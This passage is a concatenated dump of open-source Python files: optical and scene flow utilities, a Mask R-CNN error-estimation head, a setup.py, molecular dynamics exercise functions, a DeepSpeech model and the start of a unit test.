ctx_cam.project_points(tgt_points, from_world=True).permute(0, 3, 1, 2))\n\n\ndef coords_from_motion(ctx_cam, tgt_depth, tgt_cam, tgt_scnflow=None, tgt_world_scnflow=None):\n \"\"\"Get coords from motion between two cameras\"\"\"\n if is_list(ctx_cam):\n return [coords_from_motion(camera, tgt_depth, tgt_cam)\n for camera in ctx_cam]\n # If there are multiple depth maps, iterate for each\n if is_list(tgt_depth):\n return [coords_from_motion(ctx_cam, depth, tgt_cam)\n for depth in tgt_depth]\n world_points = tgt_cam.reconstruct_depth_map(\n tgt_depth, to_world=True, scene_flow=tgt_scnflow, world_scene_flow=tgt_world_scnflow)\n return ctx_cam.project_points(world_points, from_world=True).permute(0, 3, 1, 2)\n\n\ndef optflow_from_motion(ctx_cam, tgt_depth, tgt_cam, tgt_scnflow=None, tgt_world_scnflow=None):\n \"\"\"Get optical flow from motion between two cameras\"\"\"\n if is_list(tgt_depth):\n return [optflow_from_motion(\n ctx_cam, tgt_depth[i], tgt_cam,\n tgt_scnflow[i] if tgt_scnflow is not None else None,\n tgt_world_scnflow[i] if tgt_world_scnflow is not None else None,\n ) for i in range(len(tgt_depth))]\n # coords = ctx_cam.coords_from_depth(\n # tgt_depth, tgt_cam, scene_flow=tgt_scnflow, world_scene_flow=tgt_world_scnflow).permute(0, 3, 1, 2)\n coords = coords_from_motion(\n ctx_cam, tgt_depth, tgt_cam, tgt_scnflow=tgt_scnflow, tgt_world_scnflow=tgt_world_scnflow)\n return optflow_from_coords(coords)\n\n\ndef optflow_from_coords(coords):\n \"\"\"Get optical flow from coordinates\"\"\"\n return unnorm_pixel_grid(coords) - pixel_grid(coords, device=coords)\n\n\ndef warp_from_optflow(ctx_rgb, tgt_optflow):\n \"\"\"Warp image given optical flow\"\"\"\n coords = coords_from_optical_flow(tgt_optflow)\n return warp_from_coords(ctx_rgb, coords, mode='bilinear', padding_mode='zeros')\n\n\ndef reverse_optflow(tgt_optflow, ctx_optflow):\n \"\"\"Reverse optical flow for forward/backward consistency\"\"\"\n if is_list(tgt_optflow) and is_list(ctx_optflow):\n return [reverse_optflow(tgt_optflow[i], ctx_optflow[i]) for i in range(len(tgt_optflow))]\n return - warp_from_optflow(tgt_optflow, ctx_optflow)\n\n\ndef mask_from_coords(coords):\n \"\"\"Get mask from warped coordinates\"\"\"\n if is_list(coords):\n return [mask_from_coords(coord) for coord in coords]\n b, _, h, w = coords.shape\n mask = torch.ones((b, 1, h, w), dtype=torch.float32, device=coords.device, requires_grad=False)\n mask = warp_from_coords(mask, coords, mode='nearest', padding_mode='zeros')\n return mask.bool()\n\n\ndef depth_from_optflow(rgb, intrinsics, pose_context, flows,\n residual=False, clip_range=None):\n \"\"\"\n Converts pose + intrinsics + optical flow -> depth estimations\n\n Parameters\n ----------\n rgb : torch.Tensor\n Base image [B,3,H,W]\n intrinsics : torch.Tensor\n Camera intrinsics [B,3,3]\n pose_context : torch.Tensor or list[torch.Tensor]\n List of relative context camera poses [B,4,4]\n flows : torch.Tensor or list[torch.Tensor]\n List of target optical flows [B,2,H,W]\n residual : bool\n Return residual error with depth\n clip_range : tuple\n Depth range clipping values\n\n Returns\n -------\n depth : torch.Tensor\n Estimate depth map [B,1,H,W]\n \"\"\"\n # Make lists if necessary\n flows = make_list(flows)\n if is_list(flows[0]):\n return [depth_from_optflow(rgb[i], intrinsics, pose_context, flows[i], residual, clip_range)\n for i in range(len(flows))]\n pose_context = make_list(pose_context)\n # Extract rotations and translations\n rotations = [p[:, :3, :3] for p in pose_context]\n translations = [p[:, :3, -1] for p in pose_context]\n # Get bearings\n bearings = bearing_grid(rgb, intrinsics).to(rgb.device)\n rot_bearings = [mult_rotation_bearing(rotation, bearings)\n for rotation in rotations]\n # Return triangulation results\n return triangulation(rot_bearings, translations, flows, intrinsics,\n clip_range=clip_range, residual=residual)\n\n\ndef scene_flow_from_depth_optflow(depth1, depth2, cam1, cam2, optflow12, optflow21):\n \"\"\"Get scene flow from depth and optical flow\"\"\"\n # Reconstruct points from depth and camera\n pts1 = cam1.reconstruct_depth_map(depth1, to_world=False)\n pts2 = cam2.reconstruct_depth_map(depth2, to_world=False)\n # Get warping coordinates from optical flow\n coords12 = coords_from_optical_flow(optflow12)\n coords21 = coords_from_optical_flow(optflow21)\n # Warp points based on coordinates\n warp12 = warp_from_coords(pts1, coords12)\n warp21 = warp_from_coords(pts2, coords21)\n # Get scene flow as the difference between warped and original points\n scnflow12 = warp12 - pts2\n scnflow21 = warp21 - pts1\n # Return scene flow\n return scnflow12, scnflow21\n\n\ndef residual_scene_flow_from_depth_optflow(depth1, depth2, cam1, cam2, optflow12, optflow21):\n \"\"\"Get residual scene flow from depth and optical flow\"\"\"\n # Calculate scene flow\n scnflow21, scnflow12 = scene_flow_from_depth_optflow(depth1, depth2, cam1, cam2, optflow12, optflow21)\n # Calculate residual scene flow\n res_scnflow12 = residual_scene_flow(depth1, scnflow12, cam1.relative_to(cam2))\n res_scnflow21 = residual_scene_flow(depth2, scnflow21, cam2.relative_to(cam1))\n # Return residual scene flow\n return res_scnflow21, res_scnflow12\n\n\ndef residual_scene_flow(depth, scene_flow, cam_rel):\n \"\"\"Get residual scene flow from depth, motion, and scene flow\"\"\"\n # If depth and scene flow are lists, return residual for each one\n if is_list(depth) and is_list(scene_flow):\n return [residual_scene_flow(d, sf, cam_rel) for d, sf in zip(depth, scene_flow)]\n pts_scn = cam_rel.reconstruct_depth_map(depth, scene_flow=scene_flow, to_world=False)\n pts_mot = cam_rel.reconstruct_depth_map(depth, to_world=True)\n return pts_scn - pts_mot\n\n\ndef to_world_scene_flow(cam, depth, scene_flow):\n \"\"\"Convert scene flow to world coordinates\"\"\"\n pts = cam.reconstruct_depth_map(depth, to_world=True)\n pts_scnflow = cam.reconstruct_depth_map(depth, scene_flow=scene_flow, to_world=True)\n return pts_scnflow - pts\n\n\ndef fwd_bwd_optflow_consistency_check(fwd_flow, bwd_flow, alpha=0.1, beta=0.5):\n \"\"\"Forward/backward consistency check for optical flow, to produce occlusion masks\"\"\"\n if is_list(fwd_flow) and is_list(bwd_flow):\n fwd_bwd = [fwd_bwd_optflow_consistency_check(fwd_flow[i], bwd_flow[i], alpha, beta)\n for i in range(len(fwd_flow))]\n return [fb[0] for fb in fwd_bwd], [fb[1] for fb in fwd_bwd]\n\n flow_mag = torch.norm(fwd_flow, dim=1) + torch.norm(bwd_flow, dim=1)\n\n warped_bwd_flow = warp_from_optflow(bwd_flow, fwd_flow)\n warped_fwd_flow = warp_from_optflow(fwd_flow, bwd_flow)\n\n diff_fwd = torch.norm(fwd_flow + warped_bwd_flow, dim=1)\n diff_bwd = torch.norm(bwd_flow + warped_fwd_flow, dim=1)\n\n threshold = alpha * flow_mag + beta\n\n fwd_occ = (diff_fwd < threshold).unsqueeze(1)\n bwd_occ = (diff_bwd < threshold).unsqueeze(1)\n\n return fwd_occ, bwd_occ\n\n\ndef warp_optflow_dict(rgb, optflow, valid=None, keys=None):\n \"\"\"Warp RGB images based on optical flow dictionary\"\"\"\n if keys is None:\n keys = {key: list(val.keys()) for key, val in optflow.items()}\n warps = {}\n for tgt in keys:\n update_dict(warps, tgt)\n for ctx in keys[tgt]:\n warps[tgt][ctx] = warp_from_optflow(rgb[ctx], optflow[tgt][ctx])\n if valid is not None:\n warps[tgt][ctx] *= valid[tgt][ctx]\n return warps\n\n\ndef warp_motion_dict(rgb, depth, cams, scnflow=None, world_scnflow=None, valid=None, keys=None):\n \"\"\"Warp RGB images based on motion dictionary\"\"\"\n if keys is None and scnflow is not None:\n keys = {key: list(val.keys()) for key, val in scnflow.items()}\n if keys is None and world_scnflow is not None:\n keys = {key: list(val.keys()) for key, val in world_scnflow.items()}\n if keys is None and scnflow is None and world_scnflow is None:\n keys = {key: [k for k in cams.keys() if abs(k[0] - key[0]) == 1 and k[1] == key[1]] for key in cams.keys()}\n warps = {}\n for tgt in keys:\n update_dict(warps, tgt)\n for ctx in keys[tgt]:\n warps[tgt][ctx] = warp_from_motion(\n rgb[ctx], cams[ctx],\n depth[tgt][ctx] if is_dict(depth[tgt]) else depth[tgt], cams[tgt],\n tgt_scnflow=get_from_dict(scnflow, tgt, ctx),\n tgt_world_scnflow=get_from_dict(world_scnflow, tgt, ctx)\n )\n if valid is not None:\n warps[tgt][ctx] *= valid[tgt][ctx]\n return warps\n\n\ndef warped_depth_dict(depth, cams, scnflow=None, world_scnflow=None, valid=None, keys=None):\n \"\"\"Warp depth maps based on motion dictionary\"\"\"\n if keys is None and scnflow is not None:\n keys = {key: list(val.keys()) for key, val in scnflow.items()}\n if keys is None and world_scnflow is not None:\n keys = {key: list(val.keys()) for key, val in world_scnflow.items()}\n warps = {}\n for tgt in keys:\n update_dict(warps, tgt)\n for ctx in keys[tgt]:\n warps[tgt][ctx] = warp_depth_from_motion(\n depth[ctx], cams[ctx], depth[tgt], cams[tgt],\n tgt_scnflow=get_from_dict(scnflow, tgt, ctx),\n ctx_scnflow=get_from_dict(scnflow, ctx, tgt),\n tgt_world_scnflow=get_from_dict(world_scnflow, tgt, ctx),\n ctx_world_scnflow=get_from_dict(world_scnflow, ctx, tgt),\n )\n if valid is not None:\n warps[tgt][ctx] *= valid[tgt][ctx]\n return warps\n\n\ndef reverse_optflow_dict(optflow, valid=None, keys=None):\n \"\"\"Reverse optical flow dictionary\"\"\"\n if keys is None:\n keys = {key: list(val.keys()) for key, val in optflow.items()}\n reverse = {}\n for tgt in keys:\n update_dict(reverse, tgt)\n for ctx in keys[tgt]:\n reverse[tgt][ctx] = reverse_optflow(optflow[ctx][tgt], optflow[tgt][ctx])\n if valid is not None:\n reverse[tgt][ctx] *= valid[tgt][ctx]\n return reverse\n\n\ndef optflow_from_motion_dict(depth, cams, scnflow=None, world_scnflow=None, valid=None, keys=None):\n \"\"\"Get opical flow from motion dictionary\"\"\"\n if keys is None and scnflow is not None:\n keys = {key: list(val.keys()) for key, val in scnflow.items()}\n if keys is None and world_scnflow is not None:\n keys = {key: list(val.keys()) for key, val in world_scnflow.items()}\n optflow = {}\n for tgt in keys:\n update_dict(optflow, tgt)\n for ctx in keys[tgt]:\n optflow[tgt][ctx] = optflow_from_motion(\n cams[ctx], depth[tgt], cams[tgt],\n tgt_scnflow=get_from_dict(scnflow, tgt, ctx),\n tgt_world_scnflow=get_from_dict(world_scnflow, tgt, ctx),\n )\n if valid is not None:\n optflow[tgt][ctx] *= valid[tgt][ctx]\n return optflow\n\n\ndef triangulated_depth_dict(optflow, cams, valid=None, keys=None):\n \"\"\"Triangulage depth maps from optical flow dictionary\"\"\"\n if keys is None:\n keys = {key: list(val.keys()) for key, val in optflow.items()}\n depth = {}\n for tgt in keys:\n update_dict(depth, tgt)\n for ctx in keys[tgt]:\n depth[tgt][ctx] = depth_from_optflow(\n optflow[tgt][ctx], cams[ctx].K, cams[ctx].relative_to(cams[tgt]).Twc.T, [optflow[tgt][ctx]])\n if valid is not None:\n depth[tgt][ctx] *= valid[tgt][ctx]\n return depth\n\n\ndef scnflow_from_optflow_dict(optflow, depth, cams, keys=None, valid=None, to_world=True):\n \"\"\"Get scene flow from optical flow dictionary\"\"\"\n if keys is None:\n keys = {key: list(val.keys()) for key, val in optflow.items()}\n scnflow = {}\n for tgt in keys:\n update_dict(scnflow, tgt)\n for ctx in keys[tgt]:\n if ctx not in scnflow.keys() or tgt not in scnflow[ctx]:\n update_dict(scnflow, ctx)\n scnflow[ctx][tgt], scnflow[tgt][ctx] = residual_scene_flow_from_depth_optflow(\n depth[tgt], depth[ctx], cams[tgt], cams[ctx], optflow[ctx][tgt], optflow[tgt][ctx])\n if to_world:\n scnflow[tgt][ctx] = to_world_scene_flow(cams[tgt], depth[tgt], scnflow[tgt][ctx])\n scnflow[ctx][tgt] = to_world_scene_flow(cams[ctx], depth[ctx], scnflow[ctx][tgt])\n if valid is not None:\n scnflow[tgt][ctx] *= valid[tgt][ctx]\n scnflow[ctx][tgt] *= valid[ctx][tgt]\n return scnflow\n","repo_name":"TRI-ML/vidar","sub_path":"vidar/utils/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":15392,"program_lang":"python","lang":"en","doc_type":"code","stars":404,"dataset":"github-code","pt":"31"} +{"seq_id":"32272202364","text":"import fvcore.nn.weight_init as weight_init\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nimport pycocotools.mask as mask_utils\n\nfrom mask_eee_rcnn.layers import Conv2d, ShapeSpec, cat, get_norm, ConvTranspose2d\nfrom mask_eee_rcnn.utils.events import get_event_storage\nfrom mask_eee_rcnn.utils.registry import Registry\n\nROI_MASK_EEE_HEAD_REGISTRY = Registry(\"ROI_MASK_EEE_HEAD\")\nROI_MASK_EEE_HEAD_REGISTRY.__doc__ = \"\"\"\nRegistry for maskiou heads, which predicts predicted mask iou.\n\nThe registered object will be called with `obj(cfg, input_shape)`.\n\"\"\"\n\nfrom monai.losses import *\n\n\ndef mask_eee_loss(pred_mask_eee, true_positive_mask, true_negative_mask, false_positive_mask, false_negative_mask, loss_weight, loss_type):\n \"\"\"\n Compute the maskiou loss.\n\n Args:\n labels (Tensor): Given mask labels\n pred_maskiou: Predicted maskiou\n gt_maskiou: Ground Truth IOU generated in mask head\n \"\"\"\n\n gt_mask = torch.cat([\n true_positive_mask.unsqueeze(1),\n true_negative_mask.unsqueeze(1),\n false_positive_mask.unsqueeze(1),\n false_negative_mask.unsqueeze(1),\n ], dim=1).to(dtype=torch.float) # [N, 4, H, W]\n\n if loss_type == 'cross_entropy':\n gt_mask = torch.argmax(gt_mask, dim=1).to(dtype=torch.long) # [N, 4, H, W] = to [N, H, W]\n loss = F.cross_entropy(\n pred_mask_eee, \n gt_mask,\n reduction='mean')\n elif loss_type == 'dice' or loss_type == 'true_consistency_dice':\n criterion = DiceLoss(reduction='mean', softmax=True)\n loss = criterion(pred_mask_eee, gt_mask)\n elif loss_type == 'dice_focal':\n criterion = DiceFocalLoss(reduction='mean', softmax=True)\n loss = criterion(pred_mask_eee, gt_mask)\n elif loss_type == 'dice_ce':\n criterion = DiceCELoss(reduction='mean', softmax=True)\n loss = criterion(pred_mask_eee, gt_mask)\n else:\n raise NotImplementedError\n \n # import cv2\n # import numpy as np\n # n_masks = pred_mask_eee.shape[0]\n # for idx in range(n_masks):\n # pred = pred_mask_eee[idx]\n # pred = torch.argmax(pred, dim=0, keepdim=True)\n # pred = torch.cat([pred == i for i in range(4)], dim=0) # ignore false negative\n # pred = pred.detach().cpu().numpy().astype(np.uint8) * 255\n # pred = pred.transpose(1, 2, 0) # [3, H, W] -> [H, W, 3]\n # pred_vis = np.zeros([pred.shape[0], pred.shape[1], 3])\n # pred_vis[:, :, 0] = pred[:, :, 1]\n # pred_vis[:, :, 1] = pred[:, :, 0]\n # pred_vis[:, :, 2] = pred[:, :, 2]\n # gt_vis = np.zeros([pred.shape[0], pred.shape[1], 3])\n # tp_mask = true_positive_mask[idx].unsqueeze(0).detach().cpu().numpy()\n # tp_mask = (tp_mask * 255).astype(np.uint8).transpose(1, 2, 0)\n # tn_mask = true_negative_mask[idx].unsqueeze(0).detach().cpu().numpy()\n # tn_mask = (tn_mask * 255).astype(np.uint8).transpose(1, 2, 0)\n # fp_mask = false_positive_mask[idx].unsqueeze(0).detach().cpu().numpy()\n # fp_mask = (fp_mask * 255).astype(np.uint8).transpose(1, 2, 0)\n # gt_vis[:, :, 0] = tn_mask[:, :, 0]\n # gt_vis[:, :, 1] = tp_mask[:, :, 0]\n # gt_vis[:, :, 2] = fp_mask[:, :, 0]\n # cv2.imwrite('mask_{}.png'.format(idx), np.hstack([pred_vis, gt_vis]))\n\n return {'loss_mask_eee': loss * loss_weight } \n\n\ndef mask_eee_inference(pred_instances, pred_mask_eee):\n\n # pred_mask = [N, 1, H, W]\n\n # argmax version\n # pred_mask = torch.argmax(pred_mask_eee, dim=1, keepdim=True) # [N, 1, H, W]\n # pred_mask = torch.cat([pred_mask == i for i in range(4)], dim=1)[:, :3, :, :] \n\n # softmax version\n pred_mask = torch.softmax(pred_mask_eee, dim=1)\n\n\n # ignore false negative\n num_boxes_per_image = [len(i) for i in pred_instances]\n pred_mask = pred_mask.split(num_boxes_per_image, dim=0)\n for pred_errors, instance in zip(pred_mask, pred_instances):\n instance.set('pred_error', pred_errors)\n initial_masks = instance.get('pred_masks') # [N, H, W]\n n_mask = initial_masks.shape[0]\n\n # refine mask\n refined_masks = []\n for idx in range(n_mask):\n initial_mask = initial_masks[idx] # [1, H, W]\n pred_error = pred_errors[idx] # [4, H, W]\n # filter_mask = (initial_mask > 0.5).to(dtype=torch.float) # [1, H, W]\n true_positive_mask = pred_error[0:1, :, :] \n true_negative_mask = pred_error[1:2, :, :] \n false_positive_mask = pred_error[2:3, :, :] \n # false_negative_mask = pred_error[3, :, :] * (1 - filter_mask) # [H, W]\n refined_mask = true_positive_mask + false_positive_mask\n # normalize to 0 ~ 1\n # refined_mask = (refined_mask - refined_mask.min()) / (refined_mask.max() - refined_mask.min())\n refined_masks.append(refined_mask)\n instance.pred_masks = torch.stack(refined_masks, dim=0) # [N, H, W]\n\n\n # import numpy as np\n # import cv2\n # for idx in range(n_mask):\n # initial_m = initial_masks[idx].detach().cpu().numpy() # [1, H, W]\n # initial_m = initial_m.transpose(1, 2, 0) * 255\n # initial_m = initial_m.astype(np.uint8)\n # initial_m = np.concatenate([initial_m, initial_m, initial_m], axis=2)\n # initia_m_binary = (initial_m > 127).astype(np.uint8) * 255\n # pred_m = pred_errors[idx][:3, :, :].detach().cpu().numpy().transpose(1, 2, 0) # [3, H, W] # 0: tp, 1: tn, 2: fp\n # pred_m = pred_m * 255\n # pred_m = pred_m.astype(np.uint8)\n # error_m = np.zeros([pred_m.shape[0], pred_m.shape[1], 3], dtype=np.uint8)\n # error_m[:, :, 0] = pred_m[:, :, 1] \n # error_m[:, :, 1] = pred_m[:, :, 0] \n # error_m[:, :, 2] = pred_m[:, :, 2] \n\n # refined_m = refined_masks[idx].detach().cpu().numpy() # [1, H, W]\n # refined_m = refined_m.transpose(1, 2, 0) * 255\n # refined_m = refined_m.astype(np.uint8)\n # refined_m = np.concatenate([refined_m, refined_m, refined_m], axis=2)\n # cv2.imwrite('vis/pred_error_{}.png'.format(idx), \\\n # np.vstack([\n # np.hstack([initial_m, initia_m_binary]),\n # np.hstack([error_m, refined_m])\n # ]))\n\n\n \n\n\n\n@ROI_MASK_EEE_HEAD_REGISTRY.register()\nclass MaskEEEHead(nn.Module):\n def __init__(self, cfg):\n super(MaskEEEHead, self).__init__()\n\n input_channels = 257\n conv_dims = cfg.MODEL.ROI_MASK_EEE_HEAD.CONV_DIM\n num_conv = cfg.MODEL.ROI_MASK_EEE_HEAD.NUM_CONV\n\n self.pooler_resolution = cfg.MODEL.ROI_MASK_EEE_HEAD.POOLER_RESOLUTION\n self.norm = cfg.MODEL.ROI_MASK_EEE_HEAD.NORM\n\n self.conv_norm_relus = []\n for k in range(num_conv):\n conv = Conv2d(\n input_channels if k == 0 else conv_dims,\n conv_dims,\n kernel_size=3,\n stride=1,\n padding=1,\n bias=not self.norm,\n norm=get_norm(self.norm, conv_dims),\n activation=F.relu,\n )\n self.add_module(\"mask_eee_fcn{}\".format(k + 1), conv)\n self.conv_norm_relus.append(conv)\n\n if self.pooler_resolution == 14:\n self.deconv = ConvTranspose2d(\n conv_dims if num_conv > 0 else input_channels,\n conv_dims,\n kernel_size=2,\n stride=2,\n padding=0,\n )\n self.add_module(\"mask_eee_deconv\", self.deconv)\n\n\n self.predictor = Conv2d(\n conv_dims,\n 4,\n kernel_size=1,\n stride=1,\n padding=0,\n )\n self.add_module(\"mask_eee_predictor\", self.predictor)\n\n # init weights\n for layer in self.conv_norm_relus:\n weight_init.c2_msra_fill(layer)\n nn.init.normal_(self.predictor.weight, std=0.001)\n if self.predictor.bias is not None:\n nn.init.constant_(self.predictor.bias, 0)\n if self.pooler_resolution == 14:\n for layer in [self.deconv]:\n weight_init.c2_msra_fill(layer)\n\n def forward(self, x, mask):\n if self.pooler_resolution == 14:\n mask = F.max_pool2d(mask, kernel_size=2, stride=2)\n x = torch.cat((x, mask), 1)\n for layer in self.conv_norm_relus:\n x = layer(x)\n if self.pooler_resolution == 14:\n x = self.deconv(x)\n return self.predictor(F.relu(x))\n\n\ndef build_mask_eee_head(cfg):\n \"\"\"\n Build a mask eee head defined by `cfg.MODEL.ROI_MASKIOU_HEAD.NAME`.\n \"\"\"\n name = cfg.MODEL.ROI_MASK_EEE_HEAD.NAME\n return ROI_MASK_EEE_HEAD_REGISTRY.get(name)(cfg)\n","repo_name":"SeungBack/eee-for-inst-seg","sub_path":"mask_eee_rcnn/modeling/roi_heads/mask_eee_head.py","file_name":"mask_eee_head.py","file_ext":"py","file_size_in_byte":8870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19127568475","text":"import os\nfrom distutils.core import setup\n\nfrom svgwrite import VERSION, AUTHOR_NAME, AUTHOR_EMAIL\n\ndef read(fname):\n try:\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n except IOError:\n return \"File '%s' not found.\\n\" % fname\n\nsetup(name='svgwrite',\n version=VERSION,\n description='A Python library to create SVG drawings.',\n author=AUTHOR_NAME,\n url='http://bitbucket.org/mozman/svgwrite',\n download_url='http://bitbucket.org/mozman/svgwrite/downloads',\n author_email=AUTHOR_EMAIL,\n packages=['svgwrite', 'svgwrite/data'],\n provides=['svgwrite'],\n long_description=read('README.TXT')+read('NEWS.TXT'),\n platforms=\"OS Independent\",\n license=\"GPLv3\",\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.2\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n \"Programming Language :: Python :: Implementation :: PyPy\",\n \"Intended Audience :: Developers\",\n\t\"Topic :: Multimedia :: Graphics\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ]\n )\n","repo_name":"charlesmchen/typefacet","sub_path":"dependencies/svgwrite/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"31"} +{"seq_id":"44827293164","text":"import numpy as np\nfrom tqdm import tqdm_notebook as tqdm_cs\n\ndef Force_LennardJones(d,r_m,epsilon):\n ### Retourne la valeur de la force harmonique\n return 12 * epsilon * ( (r_m/d)**12 - (r_m/d)**6 ) / d\n\ndef Force_Harmonique(d,r_m,k):\n ### Retourne la norme de la force harmonique\n return - 2*k * (d - r_m)\n\ndef get_LJ_forces(positions,r_m,epsilon):\n Npart,_ = positions.shape\n forces = np.zeros(positions.shape)\n energy = 0.0\n r_m6 = r_m**6\n r_m12 = r_m**12\n factor = -12*epsilon\n \n dirVec = np.zeros((int(Npart*(Npart+1)/2-Npart),3))\n stride = np.cumsum([0]+[it for it in range(Npart-1,0,-1)])\n iparts = range(len(stride[:-1]))\n for ipart, st, nd in zip(iparts, stride[:-1], stride[1:]):\n dirVec[st:nd,:] = positions[ipart+1:] - positions[ipart]\n \n d2 = np.power(dirVec,2).sum(axis=1)\n c2 = np.power(d2,-1)\n c6 = r_m6*np.power(c2,3)\n c12 = np.power(c6,2)\n energy = epsilon * (c12 - 2*c6).sum()\n fs = (factor*(c12-c6)*c2 ).reshape((-1,1))* dirVec\n \n for ipart, st, nd in zip(iparts, stride[:-1], stride[1:]):\n forces[ipart] += fs[st:nd].sum(axis=0)\n forces[ipart+1:] -= fs[st:nd]\n energy = energy\n return forces,energy\ndef get_Harm_forces(positions,r_m,k_spring):\n Npart,_ = positions.shape\n forces = np.zeros(positions.shape)\n energy = 0.0\n r = np.subtract(positions[1:], positions[:-1])\n d = np.linalg.norm(r,axis=1)\n dx = np.subtract(d,r_m)\n \n f = - 2 * k_spring * np.divide(dx,d).reshape((-1,1))\n rf = np.multiply(r, f)\n \n forces[:Npart-1] -= rf\n forces[1:] += rf\n energy = k_spring * np.power(dx,2).sum()\n return forces,energy\ndef get_forces(positions,r_m,epsilon,k_spring):\n LJ_forces,LJ_pot = get_LJ_forces(positions,r_m,epsilon)\n H_forces,H_pot = get_Harm_forces(positions,r_m,k_spring)\n return LJ_forces+H_forces,LJ_pot,H_pot\n\ndef calcule_forces(positions,r_m,epsilon,k_spring):\n LJ_forces,LJ_pot = get_LJ_forces(positions,r_m,epsilon)\n H_forces,H_pot = get_Harm_forces(positions,r_m,k_spring)\n return LJ_forces+H_forces\n\ndef andersen_thermostat(velocities,temperature,freq,dt):\n if temperature > 0:\n vshape = velocities.shape\n mask = np.random.rand(velocities.size) < 1 - np.exp(-freq*dt)\n Nupdate = np.sum(mask)\n velocities = velocities.flatten()\n velocities[mask] = np.sqrt(temperature)*np.random.normal(loc=0.0, scale=1,size=(Nupdate,))\n velocities = velocities.reshape(vshape)\n return velocities\n\n\ndef simulateur_NVT_efficace(positions,velocities,masse,temperature,r_m,epsilon,k_spring,Nstep,dt,enregistrement_stride=10):\n mass = masse\n Nparticule, _ = positions.shape\n accelerations = np.zeros(positions.shape)\n pos = []\n vel = []\n masses = np.ones((Nparticule))*mass\n thermostat_frequency = np.sqrt(2)*np.sqrt(2*k_spring)\n Nrecord = Nstep//enregistrement_stride \n diagnostic = dict(E_variation=np.zeros((Nrecord,)),Temperature=np.zeros((Nrecord,)),\n E_system=np.zeros((Nrecord,)),E_potentiel=np.zeros((Nrecord,)),\n E_cinetique=np.zeros((Nrecord,)),time=np.zeros((Nrecord,)))\n dt_half = 0.5*dt\n #th_en = 0.5*mass*np.power(velocities,2).sum()\n sys_en = 0\n econs = 0.0\n # Calculates the initial potential energy\n forces,ljpot,sppot = get_forces(positions,r_m,epsilon,k_spring)\n Ekin_tot = 0.5*mass*np.power(velocities,2).sum()\n sys_en += ljpot + sppot + Ekin_tot\n econs += sys_en \n ii = 0\n for it in tqdm_cs(range(Nstep)):\n \n #Apply thermostat\n econs += 0.5*mass*np.power(velocities,2).sum()\n velocities = andersen_thermostat(velocities,temperature,thermostat_frequency,dt)\n #CoM = np.average(velocities,weights=masses,axis=0).reshape((1,3))\n #velocities = velocities - CoM\n econs -= 0.5*mass*np.power(velocities,2).sum()\n \n # half update of velocities\n velocities = velocities + dt_half * accelerations\n # update of positions\n positions = positions + dt * velocities\n # update forces from new posittions\n forces,ljpot,sppot = get_forces(positions,r_m,epsilon,k_spring)\n # update acceleration\n accelerations = forces / mass\n # half update of velocities\n velocities = velocities + dt_half * accelerations\n \n Ekin_tot = 0.5*mass*np.power(velocities,2).sum()\n econs += ljpot + sppot + Ekin_tot - sys_en\n sys_en = ljpot + sppot + Ekin_tot\n \n if it % enregistrement_stride == 0:\n diagnostic['E_variation'][ii] = econs\n diagnostic['E_system'][ii] = sys_en\n diagnostic['E_cinetique'][ii] = Ekin_tot\n diagnostic['time'][ii] = it * dt\n diagnostic['Temperature'][ii] = Ekin_tot/1.5/len(positions)\n diagnostic['E_potentiel'][ii] = ljpot+sppot\n ii += 1\n \n vel.append(velocities)\n pos.append(positions)\n \n \n return pos,vel,diagnostic","repo_name":"lab-cosmo/marvel-college","sub_path":"MD/Exercise_functions.py","file_name":"Exercise_functions.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"26076053757","text":"import numpy as np\nimport torch\nimport torch.nn as nn\n# from config import *\n\nclass DeepSpeech(nn.Module):\n def __init__(self, config):\n super(DeepSpeech, self).__init__()\n batch_size = config[\"batch_size\"]\n input_size = config[\"input_size\"]\n n_context = config[\"n_context\"]\n linear_size = config[\"linear_size\"]\n self.rnn_hidden_size = config[\"rnn_hidden_size\"]\n vocab_size = config[\"vocab_size\"]\n\n hidden_1 = linear_size \n hidden_2 = linear_size\n hidden_5 = linear_size\n self.hidden_3 = self.rnn_hidden_size\n self.output_size = vocab_size + 1\n\n self.mlp123 = nn.Sequential(\n nn.Linear(input_size+2*input_size*n_context, hidden_1),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_1, hidden_2),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_2, self.hidden_3),\n nn.ReLU(inplace=True),\n )\n self.rnn = nn.RNN(self.hidden_3, self.rnn_hidden_size, num_layers=1, bidirectional=False) # bidir true\n self.mlp56 = nn.Sequential(\n nn.Linear(self.rnn_hidden_size, hidden_5),\n nn.ReLU(inplace=True),\n nn.Linear(hidden_5, self.output_size),\n )\n \n def forward(self, x):\n # x: [b, seq_len, n_input + 2*input_size*n_context]\n batch_size = x.size(0)\n seq_len = x.size(1)\n x = x.permute(1, 0, 2)\n x = x.reshape(seq_len*batch_size, -1)\n x = self.mlp123(x)\n x = x.reshape(seq_len, batch_size, self.hidden_3)\n x, _ = self.rnn(x)\n x = x.reshape(seq_len*batch_size, self.rnn_hidden_size)\n x = self.mlp56(x)\n x = x.reshape(seq_len, batch_size, self.output_size)\n return x.log_softmax(2)","repo_name":"sherryzyy/GPU-Accelerated-Speech-Recognition","sub_path":"baseline/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23525231578","text":"import unittest\n\nimport numpy as np\n\nfrom mo.graph.graph import Node, erase_node\nfrom mo.middle.passes.eliminate import mark_output_reachable_nodes, graph_clean_up, \\\n get_nodes_with_attributes, mark_const_producer_nodes\nfrom mo.utils.unittest.graph import build_graph\n\nnodes_attributes = {'placeholder_1': {'type': 'Placeholder', 'kind': 'op'},\n 'placeholder_2': 